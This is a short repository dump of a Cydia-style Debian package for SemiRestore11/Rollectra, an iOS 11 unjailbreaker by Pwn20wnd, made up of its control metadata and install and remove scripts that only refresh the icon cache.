-------------------------------------------------------------------------------- 1 | Package: com.pwn20wnd.semirestore11 2 | Version: 1.2 3 | Architecture: iphoneos-arm 4 | Description: A full system unjailbreaker that supports all devices running iOS 11. 5 | Maintainer: Pwn20wnd 6 | Depends: cy+cpu.arm64, coreutils-bin, uikittools, rsync, firmware (>= 11.0) 7 | Conflicts: org.coolstar.semirestore11-lite 8 | Replaces: org.coolstar.semirestore11-lite 9 | Section: System 10 | Author: Pwn20wnd 11 | Name: SemiRestore11 / Rollectra 12 | -------------------------------------------------------------------------------- /layout/DEBIAN/postinst: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | uicache 3 | exit 0 4 | 5 | -------------------------------------------------------------------------------- /layout/DEBIAN/postrm: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | uicache 3 | exit 0 4 | 5 | --------------------------------------------------------------------------------